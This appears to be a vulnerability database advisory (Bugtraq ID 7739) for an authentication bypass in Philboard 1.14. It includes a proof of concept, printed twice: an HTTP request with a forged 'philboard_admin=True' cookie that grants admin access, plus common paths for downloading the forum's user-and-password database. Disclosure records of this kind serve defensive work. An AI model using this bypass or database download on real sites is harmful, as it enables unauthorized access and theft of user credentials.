Philboard philboard_admin.ASP Authentication Bypass Vulnerability
BID:7739
Info
Philboard philboard_admin.ASP Authentication Bypass Vulnerability
| Bugtraq ID: | 7739 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 29 2003 12:00AM |
| Updated: | May 29 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to [email protected]. |
| Vulnerable: |
Philboard philboard 1.14 |
| Not Vulnerable: | |
Exploit / POC
Philboard philboard_admin.ASP Authentication Bypass Vulnerability
The following proof of concept has been supplied:
Use telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: example.com
Cookie: philboard_admin=True;
Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
The following proof of concept has been supplied:
Use telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: example.com
Cookie: philboard_admin=True;
Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb